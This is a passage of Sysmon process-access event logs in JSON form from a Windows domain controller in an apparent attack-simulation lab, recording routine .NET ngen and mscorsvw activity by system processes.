icrosoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.538\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010734A0C00}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.538","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010734A0C00}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.538\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010734A0C00}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.538","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010734A0C00}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.585\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-220F-5F25-0000-00100AE00A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.585","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-220F-5F25-0000-00100AE00A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.585\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-220F-5F25-0000-00100AE00A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.585","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-220F-5F25-0000-00100AE00A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-220F-5F25-0000-00100AE00A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-220F-5F25-0000-00100AE00A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:25.913\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2245-5F25-0000-0010E7520C00}\r\nTargetProcessId: 4156\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:25.913","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2245-5F25-0000-0010E7520C00}","TargetProcessId":"4156","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:25.913\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2245-5F25-0000-0010E7520C00}\r\nTargetProcessId: 4156\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:25.913","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2245-5F25-0000-0010E7520C00}","TargetProcessId":"4156","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:25.929\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2245-5F25-0000-0010E7520C00}\r\nTargetProcessId: 4156\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:25.929","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2245-5F25-0000-0010E7520C00}","TargetProcessId":"4156","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\